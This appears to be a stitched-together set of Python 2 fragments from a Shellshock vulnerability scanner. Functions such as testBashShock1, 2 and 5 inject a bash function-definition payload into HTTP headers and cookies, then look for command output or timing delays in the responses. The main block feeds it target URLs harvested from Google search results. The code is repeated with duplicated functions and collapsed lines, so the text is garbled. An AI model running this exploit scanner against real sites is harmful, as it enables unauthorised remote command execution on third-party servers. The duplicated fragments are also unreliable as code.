def testBashShock1(url):
opener = urllib2.build_opener()
webutils.setupOpener(opener)
req = urllib2.Request(url)
req.add_header('Proxy-Connection', 'keep-alive')
req.add_header('Cache-Control', 'max-age=0')
req.add_header('X-Test', EXPLOIT1)
#req.add_header('User-Agent', EXPLOIT1)
#req.add_header('Referer', EXPLOIT1)
#req.add_header('X-Forwarded-For', EXPLOIT1)
#print '******* ' + url + ' *******'
try:
response = opener.open(req, timeout = 15)
if response:
if 'root' in response.info() or 'nobody' in response.info() or 'daemon' in response.info():
print
print 'PANIC!!!'
print '******* [shock] [URL: %s], [Header: %s] [1]' % (url, 'X-Test')
print 'root:' + response.info().getheader('root')
return True
#html = response.read()
#if html.find('root:') != -1:
# print
# print 'PANIC!!!'
# print '******* [shock] [URL: %s], [Header: %s] [2]' % (url, 'X-Test')
# return True
#for k, v in response.info().items():
# print k + ': ', v
except Exception, e:
pass
def testBashShock1(url):
opener = urllib2.build_opener()
webutils.setupOpener(opener)
req = urllib2.Request(url)
req.add_header('Proxy-Connection', 'keep-alive')
req.add_header('Cache-Control', 'max-age=0')
req.add_header('X-Test', EXPLOIT1)
#req.add_header('User-Agent', EXPLOIT1)
#req.add_header('Referer', EXPLOIT1)
#req.add_header('X-Forwarded-For', EXPLOIT1)
#print '******* ' + url + ' *******'
try:
response = opener.open(req, timeout=15)
if response:
if 'root' in response.info() or 'nobody' in response.info(
) or 'daemon' in response.info():
print
print 'PANIC!!!'
print '******* [shock] [URL: %s], [Header: %s] [1]' % (
url, 'X-Test')
print 'root:' + response.info().getheader('root')
return True
#html = response.read()
#if html.find('root:') != -1:
# print
# print 'PANIC!!!'
# print '******* [shock] [URL: %s], [Header: %s] [2]' % (url, 'X-Test')
# return True
#for k, v in response.info().items():
# print k + ': ', v
except Exception, e:
pass
def scan(self): self._opener = urllib2.build_opener() webutils.setupOpener(self._opener) #records = set() urls = self.getUrls() for url in urls: #if not url in records: # records.add(url) self.scanUrl(url) return True
def scan(self):
self._opener = urllib2.build_opener()
webutils.setupOpener(self._opener)
#records = set()
urls = self.getUrls()
for url in urls:
#if not url in records:
# records.add(url)
self.scanUrl(url)
return True
def testBashShock2(url):
opener = urllib2.build_opener()
webutils.setupOpener(opener)
req = urllib2.Request(url)
exploit = "() { :;}; echo 'X-Test: hello'"
#req.add_header('Proxy-Connection', 'keep-alive')
#req.add_header('Cache-Control', 'max-age=0')
req.add_header('Referer', exploit)
try:
response = opener.open(req, timeout = 15)
if response:
if 'X-Test' in response.info():
print
print 'PANIC!!!'
print '******* [shock] [URL: %s], [Header: %s] [*]' % (url, 'X-Test')
print 'root:' + response.info().getheader('root')
return True
except Exception, e:
pass
def testBashShockByTime(url, header):
opener = urllib2.build_opener()
webutils.setupOpener(opener)
req = urllib2.Request(url)
webutils.setupRequest(req)
req.add_header('Proxy-Connection', 'keep-alive')
req.add_header('Cache-Control', 'max-age=0')
response, t1 = webutils.measureRequest(opener, req, TIMEBASED_TIMEOUT)
req.add_header(header, EXPLOIT2)
response, t2 = webutils.measureRequest(opener, req, TIMEBASED_TIMEOUT)
if t2 >= SLEEP_TIME and t2 > t1 and t2 < TIMEBASED_TIMEOUT:
print
print 'PANIC!!!'
print '******* [shock] [URL: %s] [Header: %s]' % (url, header)
print
return True
"""
#req.add_header('X-Test', EXPLOIT2)
#req.add_header('User-Agent', EXPLOIT2)
#req.add_header('Referer', EXPLOIT2)
#print '******* ' + url + ' *******'
try:
t1 = time.time()
response = opener.open(req, timeout = TIMEBASED_TIMEOUT)
t2 = time.time() - t1
if t2 >= SLEEP_TIME and t2 < TIMEBASED_TIMEOUT:
t1 = time.time()
response = opener.open(req, timeout = TIMEBASED_TIMEOUT)
t2 = time.time() - t1
if t2 >= SLEEP_TIME and t2 < TIMEBASED_TIMEOUT:
print
print 'PANIC!!!'
print '******* [URL: %s] [Header: %s]' % (url, header)
print
return True
except Exception, e:
pass
# print 'Exception: ', e
"""
return False
def testBashShockByTime(url, header):
opener = urllib2.build_opener()
webutils.setupOpener(opener)
req = urllib2.Request(url)
webutils.setupRequest(req)
req.add_header('Proxy-Connection', 'keep-alive')
req.add_header('Cache-Control', 'max-age=0')
response, t1 = webutils.measureRequest(opener, req, TIMEBASED_TIMEOUT)
req.add_header(header, EXPLOIT2)
response, t2 = webutils.measureRequest(opener, req, TIMEBASED_TIMEOUT)
if t2 >= SLEEP_TIME and t2 > t1 and t2 < TIMEBASED_TIMEOUT:
print
print 'PANIC!!!'
print '******* [shock] [URL: %s] [Header: %s]' % (url, header)
print
return True
"""
#req.add_header('X-Test', EXPLOIT2)
#req.add_header('User-Agent', EXPLOIT2)
#req.add_header('Referer', EXPLOIT2)
#print '******* ' + url + ' *******'
try:
t1 = time.time()
response = opener.open(req, timeout = TIMEBASED_TIMEOUT)
t2 = time.time() - t1
if t2 >= SLEEP_TIME and t2 < TIMEBASED_TIMEOUT:
t1 = time.time()
response = opener.open(req, timeout = TIMEBASED_TIMEOUT)
t2 = time.time() - t1
if t2 >= SLEEP_TIME and t2 < TIMEBASED_TIMEOUT:
print
print 'PANIC!!!'
print '******* [URL: %s] [Header: %s]' % (url, header)
print
return True
except Exception, e:
pass
# print 'Exception: ', e
"""
return False
def testBashShock2(url):
opener = urllib2.build_opener()
webutils.setupOpener(opener)
req = urllib2.Request(url)
exploit = "() { :;}; echo 'X-Test: hello'"
#req.add_header('Proxy-Connection', 'keep-alive')
#req.add_header('Cache-Control', 'max-age=0')
req.add_header('Referer', exploit)
try:
response = opener.open(req, timeout=15)
if response:
if 'X-Test' in response.info():
print
print 'PANIC!!!'
print '******* [shock] [URL: %s], [Header: %s] [*]' % (
url, 'X-Test')
print 'root:' + response.info().getheader('root')
return True
except Exception, e:
pass
def testBashShock5(url):
opener = urllib2.build_opener()
webutils.setupOpener(opener)
req = urllib2.Request(url)
req.add_header('Proxy-Connection', 'keep-alive')
req.add_header('Cache-Control', 'max-age=0')
req.add_header('Cookie', EXPLOIT3)
try:
response = opener.open(req, timeout = 15)
html = response.read()
if html.find('uid=') != -1 and html.find('gid=') != -1 and html.find('groups=') != -1:
print
print 'PANIC!!!'
print '******* [shock] [URL: %s], [Header: %s] [5]' % (url, 'Cookie')
print 'root:' + response.info().getheader('root')
return True
return False
except Exception, e:
#print e
pass
def testBashShock2(url):
opener = urllib2.build_opener()
webutils.setupOpener(opener)
req = urllib2.Request(url)
req.add_header('Proxy-Connection', 'keep-alive')
req.add_header('Cache-Control', 'max-age=0')
req.add_header('X-Test', EXPLOIT2)
req.add_header('User-Agent', EXPLOIT2)
req.add_header('Referer', EXPLOIT2)
req.add_header('X-Forwarded-For', EXPLOIT2)
print '******* ' + url + ' *******'
try:
t1 = time.time()
response = opener.open(req, timeout=30)
t2 = time.time() - t1
if t2 >= 17 and t2 < 30:
print
print 'PANIC!!!'
print
except Exception, e:
print 'Exception: ', e
def testBashShock2(url):
opener = urllib2.build_opener()
webutils.setupOpener(opener)
req = urllib2.Request(url)
req.add_header('Proxy-Connection', 'keep-alive')
req.add_header('Cache-Control', 'max-age=0')
req.add_header('X-Test', EXPLOIT2)
req.add_header('User-Agent', EXPLOIT2)
req.add_header('Referer', EXPLOIT2)
req.add_header('X-Forwarded-For', EXPLOIT2)
print '******* ' + url + ' *******'
try:
t1 = time.time()
response = opener.open(req, timeout = 30)
t2 = time.time() - t1
if t2 >= 17 and t2 < 30:
print
print 'PANIC!!!'
print
except Exception, e:
print 'Exception: ', e
def testBashShock5(url):
opener = urllib2.build_opener()
webutils.setupOpener(opener)
req = urllib2.Request(url)
req.add_header('Proxy-Connection', 'keep-alive')
req.add_header('Cache-Control', 'max-age=0')
req.add_header('Cookie', EXPLOIT3)
try:
response = opener.open(req, timeout=15)
html = response.read()
if html.find('uid=') != -1 and html.find('gid=') != -1 and html.find(
'groups=') != -1:
print
print 'PANIC!!!'
print '******* [shock] [URL: %s], [Header: %s] [5]' % (url,
'Cookie')
print 'root:' + response.info().getheader('root')
return True
return False
except Exception, e:
#print e
pass
def testBashShock1(url):
opener = urllib2.build_opener()
webutils.setupOpener(opener)
req = urllib2.Request(url)
req.add_header('Proxy-Connection', 'keep-alive')
req.add_header('Cache-Control', 'max-age=0')
req.add_header('X-Test', EXPLOIT1)
req.add_header('User-Agent', EXPLOIT1)
req.add_header('Referer', EXPLOIT1)
req.add_header('X-Forwarded-For', EXPLOIT1)
print '******* ' + url + ' *******'
try:
response = opener.open(req)
if response:
if response.info().getheader('root'):
print
print 'PANIC!!!'
print
print 'root:' + response.info().getheader('root')
#for k, v in response.info().items():
# print k + ': ', v
except Exception, e:
print 'Exception: ', e
def testBashShock1(url):
opener = urllib2.build_opener()
webutils.setupOpener(opener)
req = urllib2.Request(url)
req.add_header('Proxy-Connection', 'keep-alive')
req.add_header('Cache-Control', 'max-age=0')
req.add_header('X-Test', EXPLOIT1)
req.add_header('User-Agent', EXPLOIT1)
req.add_header('Referer', EXPLOIT1)
req.add_header('X-Forwarded-For', EXPLOIT1)
print '******* ' + url + ' *******'
try:
response = opener.open(req)
if response:
if response.info().getheader('root'):
print
print 'PANIC!!!'
print
print 'root:' + response.info().getheader('root')
#for k, v in response.info().items():
# print k + ': ', v
except Exception, e:
print 'Exception: ', e
if __name__ == '__main__':
opts, args = getopt.getopt(sys.argv[1:], "n:b:w:u:")
for op, value in opts:
if op == '-n':
resultCount = int(value)
elif op == '-b':
beginNumber = int(value)
elif op == '-u':
url = value
elif op == '-w':
waitTime = int(value)
opener = urllib2.build_opener()
webutils.setupOpener(opener)
if len(url) > 0:
testBashShock1(url)
testBashShock2(url)
sys.exit(0)
#print resultCount
#print args[0]
i = 0
#import pdb
#pdb.set_trace()
for url in google.google(opener, args[0], resultCount, beginNumber):
i += 1
testBashShock2(url)
if waitTime > 0:
time.sleep(waitTime)
print 'Exception: ', e opts, args = getopt.getopt(sys.argv[1:], "n:b:w:u:") for op, value in opts: if op == '-n': resultCount = int(value) elif op == '-b': beginNumber = int(value) elif op == '-u': url = value elif op == '-w': waitTime = int(value) opener = urllib2.build_opener() webutils.setupOpener(opener) if len(url) > 0: testBashShock1(url) testBashShock2(url) sys.exit(0) #print resultCount #print args[0] i = 0 #import pdb #pdb.set_trace() for url in google.google(opener, args[0], resultCount, beginNumber): i += 1 testBashShock2(url) if waitTime > 0: time.sleep(waitTime)